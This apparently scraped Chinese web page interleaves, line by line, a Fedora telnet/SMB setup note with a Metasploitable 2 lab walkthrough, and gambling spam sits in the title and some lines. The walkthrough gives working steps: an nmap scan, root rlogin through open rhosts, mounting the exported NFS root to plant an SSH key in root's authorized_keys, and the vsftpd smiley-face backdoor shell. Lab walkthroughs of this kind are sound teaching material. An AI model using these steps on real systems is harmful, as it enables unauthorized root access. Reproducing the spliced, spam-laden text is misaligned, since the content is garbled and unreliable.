Fedora 开发环境的建立(SMB、TELNET)奥门永利误乐域

为了开发驱动方便,使用2。6内核的Linux系统选择了Fedora(2.6.20),是RedHat的延续,按以往的步骤在虚拟机上安装,都很顺利,但是在TELNET配置的时候,发现XINTD服务都没有了!已经不是默认安装了!

开始工作

使用以下命令安装telnet

当虚拟系统启动之后,使用用户名msfadmin,和密码msfadmin登陆。使用shell运行ifconfig命令来确认IP地址。

yum -y install telnet-server

msfadmin@metasploitable:~$ ifconfig

前提:网络需要正常

eth0    Link encap:Ethernet  HWaddr 00:0c:29:9a:52:c1

修改:/etc/xinetd.d/telnet中的disable = yes改为no

inet addr:192.168.99.131  Bcast:192.168.99.255  Mask:255.255.255.0

smb共享设置:

inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link

smbpasswd -a root (新密码不能和root密码相同)

UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1

/sbin/service smb start 启动

服务

关闭selinux :system->administration->firewallandselinux

作为攻击者的操作系统(linux,大多数时候使用BackTrack),我们需要在虚拟机中通过使用nmap来辨认开放的端口。接下来的命令能够扫描目标系统-Metasploitable
2的所有TCP端口。

奥门永利误乐域 1

root@ubuntu:~# nmap -p0-65535 192.168.99.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT

Nmap scan report for 192.168.99.131

Host is up (0.00028s latency).

Not shown: 65506 closed ports

PORT      STATE SERVICE

21/tcp    open  ftp

22/tcp    open  ssh

23/tcp    open  telnet

25/tcp    open  smtp

53/tcp    open  domain

80/tcp    open  http

111/tcp  open  rpcbind

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

512/tcp  open  exec

513/tcp  open  login

514/tcp  open  shell

1099/tcp  open  rmiregistry

1524/tcp  open  ingreslock

2049/tcp  open  nfs

2121/tcp  open  ccproxy-ftp

3306/tcp  open  mysql

3632/tcp  open  distccd

5432/tcp  open  postgresql

5900/tcp  open  vnc

6000/tcp  open  X11

6667/tcp  open  irc

6697/tcp  open  unknown

8009/tcp  open  ajp13

8180/tcp  open  unknown

8787/tcp  open  unknown

39292/tcp open  unknown

43729/tcp open  unknown

44813/tcp open  unknown

55852/tcp open  unknown

MAC Address: 00:0C:29:9A:52:C1 (VMware)

目标系统中几乎每一个端口监听的服务都给我们提供一个远程接入点。在接下来的章节中,我们将会漫步于这些路径之中。

服务:Unix基础

TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts
+
+)。要利用这个配置,确保rsh客户端已经安装(在ubuntu上),然后以root权限运行下列命令,如果被提示需要一个SSH秘钥,这表示rsh客户端没有安装,ubuntu一般默认使用SSH。

# rlogin -l root 192.168.99.131

Last login: Fri Jun  1 00:10:39 EDT 2012 from :0.0 on pts/0

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
2008 i686

这是如此轻而易举办到。接下来我们要查看的是网络文件系统(NFS)。NFS可以通过扫描2049端口或者查询端口映射程序的服务列表进行确认。下面的列子我们将通过rpcinfo来确认NFS,通过showmount
-e 来确定“
/”共享(文件系统的根目录)已经被导出。我们需要安装ubuntu中的rpcbind和nfs-common的依赖包。

root@ubuntu:~# rpcinfo -p 192.168.99.131

program vers proto  port  service

100000    2  tcp    111  portmapper

100000    2  udp    111  portmapper

100024    1  udp  53318  status

100024    1  tcp  43729  status

100003    2  udp  2049  nfs

100003    3  udp  2049  nfs

100003    4  udp  2049  nfs

100021    1  udp  46696  nlockmgr

100021    3  udp  46696  nlockmgr

100021    4  udp  46696  nlockmgr

100003    2  tcp  2049  nfs

100003    3  tcp  2049  nfs

100003    4  tcp  2049  nfs

100021    1  tcp  55852  nlockmgr

100021    3  tcp  55852  nlockmgr

100021    4  tcp  55852  nlockmgr

100005    1  udp  34887  mountd

100005    1  tcp  39292  mountd

100005    2  udp  34887  mountd

100005    2  tcp  39292  mountd

100005    3  udp  34887  mountd

100005    3  tcp  39292  mountd

root@ubuntu:~# showmount -e 192.168.99.131

Export list for 192.168.99.131:

/ *

获取一个系统的可写入的文件系统权限是很简单的。我们需要在攻击者的系统上创建一个新的SSH秘钥,挂载NFS接口,然后把我们的秘钥添加到root使用者账号的认证秘钥文件里:

root@ubuntu:~# ssh-keygen

Generating public/private rsa key pair.

Enter file in which to save the key (/root/.ssh/id_rsa):

Enter passphrase (empty for no passphrase):

Enter same passphrase again:

Your identification has been saved in /root/.ssh/id_rsa.

奥门永利误乐域,Your public key has been saved in /root/.ssh/id_rsa.pub.

root@ubuntu:~# mkdir /tmp/r00t

root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/

root@ubuntu:~# cat ~/.ssh/id_rsa.pub >>
/tmp/r00t/root/.ssh/authorized_keys

root@ubuntu:~# umount /tmp/r00t

root@ubuntu:~# ssh root@192.168.99.131

Last login: Fri Jun  1 00:29:33 2012 from 192.168.99.128

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC
2008 i686

服务:后门

Metasploitable2
在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”:)“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit上面的攻击模块自动攻击。

root@ubuntu:~# telnet 192.168.99.131 21

Trying 192.168.99.131…

发表评论

电子邮件地址不会被公开。 必填项已用*标注